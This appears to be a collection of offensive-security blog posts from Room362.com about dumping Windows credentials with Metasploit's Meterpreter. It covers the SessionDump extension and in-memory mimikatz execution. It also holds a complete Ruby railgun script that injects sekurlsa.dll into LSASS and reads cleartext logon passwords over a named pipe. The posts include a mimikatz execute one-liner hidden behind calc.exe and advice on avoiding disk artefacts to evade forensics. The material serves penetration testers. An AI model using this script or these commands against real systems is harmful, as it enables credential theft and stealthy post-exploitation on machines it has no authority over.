Room362.com

Mimikatz is awesome right, so is WCE. But both have one fatal flaw, even though you can execute them in memory {link} - you still have to have the binaries, remember the command to execute it in memory, and ultimately transfer the entire binary over so that metasploit can do its thing.

Then along came SessionDump. I only noticed this because someone was tweeting congratulations to someone on writing it:

No blog post or huge Vegas lights talk on it at DefCon or Blackhat. Just posted online in a corner of the Internet:

http://www.hsc.fr/ressources/outils/sessiondump/

Before we get started lets be clear about one thing. Sessiondump while awesome doesn't do everything that Mimikatz does. However, it does do the feature of mimikatz that I do use the most, the logged on user hash dumping as well as the wdigest clear text password dumping. It does this as a Meterpreter extension that operates using reflective DLL injection. Does that solve our minor issues we had with mimikatz, as of right now, only partially. This code was simply posted online, not in a pull request or submitted to Metasploit in any way. So you still have to have the binary + code. What about the remembering, surely it makes it so I can just tab complete my way to passwords right? Yup, it does, but until/if it is in the Metasploit trunk you will still have to remember how to get it installed (which we will go over in a bit). The final question is yes it does still transfer a complete DLL over to the host same as any of the other extensions (not to disk mind you, just memory),.

Without further ado lets go ahead and get the file and do a bunch of extracting. 

And finally placing everything in it's correct place, which was nice of the author to make easy by making the archive the same as the Metasploit directory structure:

Cool, everything should be good to go. Lets use this thing. I'm using psexec to get a shell but any way you get a windows native meterpreter fine, with one caveat, and its the same as with any of the other aforementioned tools. You need to be Admin (past UAC, w/ SeDebug privilege) or NT\AUTHORITY SYSTEM.  After that it's cake, load the extension:

 

Here is the available commands:

And run getHashes:

or getwDigestPasswords:

Thats is, you free passwords, YAY...

Possible issues you may run into:

1) If you are on a x64 box and meterpreter isn't running in a x64 process it will fail saying that it doesn't have the correct version offsets, here is how you can check:

x64 system and Meterpreter is x86/win32. Lets find a good process to migrate into and kick it from there. Winlogon isn't the greatest choices since if meterpreter decides to crash it during migration then the system will go down, whereas a service running as SYSTEM will probably just restart if something fails.

2) If by any chance you are running it against a system the author hasn't gotten the offsets for. I don't' have a screenshot for this one because he covers all the languages I have CMs for, but the author was awesome enough to include a few python scripts that can help you generate the correct offsets. I'll show you by running it on my lsass and widgets.dll files even though he already has this data included in the CSV file that comes with session dump.

Thats all for now folks, may the shells be with you.

 

Executing WCE.exe in memory as demoed by Egypt here: https://community.rapid7.com/community/metasploit/blog/2012/05/08/eternal-sunshine-of-the-spotless-ram has two issues with it. 1, you leave a file on disk with your hashes and clear text passwords. That just won't do. 2. There is this DLL called WCEAUX.dll that gets written for the briefest second to disk:

(yes I realize I'm running this on disk 'wce32.exe', but it exhibits the same DLL drop when doing in-memory)

Now, don't get me wrong, I love WCE, and Hernan Ochoa does an amazing job with it, but when it comes down to it, it's the best tool for the job. And today, that's now Mimikatz. 

Just like WCE to execute it in memory you use the -m flag for execute:

execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

For mimikatz to automatically send commands require double quotes in the command line arguments, so we use single quotes in meterpreter to encircle the execute arguments (-a). Running first "sekurlsa::logonPasswords full" then 'exit' to auto-exit mimikatz console. Like so:

And all you get forensically is calc.exe loading a ton of DLLs it has no business loading but no new files touch disk ;-)

The downloads for Mimikatz are were they always are:

http://blog.gentilkiwi.com/mimikatz

Oh, did I mention that Mimikatz is open source and the in-memory goodness has been uploaded to svn:

https://code.google.com/p/mimikatz/

Awesome work @gentilkiwi

If you want to check out the the fix that was implemented to work with Meterpreter's in-memory goodness check here:

https://code.google.com/p/mimikatz/source/detail?r=33

One of the powers of Metasploit is it's ability to stay memory resident. Through the use of reflective DLL injection even keeping new functionality the attack loads from ever touching disk. Well, the first thing I wanted to do with Mimikatz is get to that same level.

Here is my first step to that end; a railgun based Meterpreter script. Now before going all reflective with it I needed to understand how the DLL worked. Thankfully @gentilkiwi stepped in and stopped my head from getting bloody. In this first step we will be removing the need for the mimikatz.exe binary, still needing the DLL to be uploaded, but we'll get there in the subsequent posts.

Ignore the do_cmd for now and I stepped through remote DLL injection here. So the first odd lines is 

handle = client.railgun.kernel32.CreateNamedPipeW('\\\\.\\pipe\\kiwi\\mimikatz', 'PIPE_ACCESS_DUPLEX', 'PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT', 1, 0, 0, 30000,nil)['return']

connectedlsass = client.railgun.kernel32.ConnectNamedPipe(handle,nil)

 

Essentially these connect to the Named Pipe that the sekurlsa.dll uses to talk to the mimikatz.exe in it's normal operation. Then we just use the windows API call "ReadFile" from there on out.

client.railgun.kernel32.ReadFile(handle,248,248,4,nil)

One of the draw backs to doing this all remotely is that Railgun doesn't have the memory management insight like the Windows OS does. Being able to know when pipes are ready to be read or written to is  a bit of a challenge and the call hangs your IRB / meterpreter session if you get it wrong. I've overcome this for the initial "banner" that sekurlsa writes by knowing the exact length (248 bytes in this case) of the text. For subsequent commands like "ping" and "getLogonPasswords" I simply have to read one character at a time, which is a slow process but removes any chance of getting hung. (Two bytes for every Unicode character)

If you have any questions on how/why this works or have a better way please leave your comments and questions below or hit me up on twitter!

Meterpreter Script:

def do_cmd(handle,cmd)
	ucommand = Rex::Text.to_unicode(cmd)
	sendcmd = client.railgun.kernel32.WriteFile(handle,ucommand,ucommand.size,4,nil)
	good2go = false
	newline = false
	readstring = []
	while good2go == false
		# Have to pull data 1 unicode character at a time
		# this is because the pipe won't write or read if
		# too much was written or read by the "client" (us)
		pull = client.railgun.kernel32.ReadFile(handle,2,2,4,nil)
		# Check to see if our end of read check is there: \n000 @\000
		if pull['lpBuffer'] == "@\000" and newline == true
			good2go = true
		else
			readstring << pull['lpBuffer']
		end
		
		# Ready the newline var for previous check on next loop
		if pull['lpBuffer'] == "\n\000"
			newline = true
		else
			newline = false
		end
	end
	
	print_status(readstring.join(""))
end

print_status("x86 Detected - Using x86 mimikatz")
handle = client.railgun.kernel32.CreateNamedPipeW('\\\\.\\pipe\\kiwi\\mimikatz', 'PIPE_ACCESS_DUPLEX', 'PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT', 1, 0, 0, 30000,nil)['return']
print_status("Handle: #{handle}")
framework.threads.spawn('injectlsass',false) {
	pid = client.sys.process['lsass.exe']
	print_status("LSASS located at PID: #{pid}")
	pathtomimi = "C:\\sekurlsa.dll"

	pay = client.framework.payloads.create("windows/loadlibrary")
	pay.datastore["DLL"] = pathtomimi
	pay.datastore["EXITFUNC"] = 'thread'

	raw = pay.generate
	targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
	mem = targetprocess.memory.allocate(raw.length + (30024))
	targetprocess.memory.write(mem, raw)
	sleep(2)
	targetprocess.thread.create(mem, 0)
	print_status("Successfully Injected into LSASS")
}
print_status("Waiting for LSASS injection to complete")
connectedlsass = client.railgun.kernel32.ConnectNamedPipe(handle,nil)
print_status("Mimikatz has called home, ready for command")
sleep(2)
print_status("Reading banner")
client.railgun.kernel32.ReadFile(handle,248,248,4,nil)
print_status("Doing a quick ping to make sure things are working...")
do_cmd(handle,'ping')
print_status("If you made it this far it worked, doing getLogonPasswords")
do_cmd(handle, 'getLogonPasswords')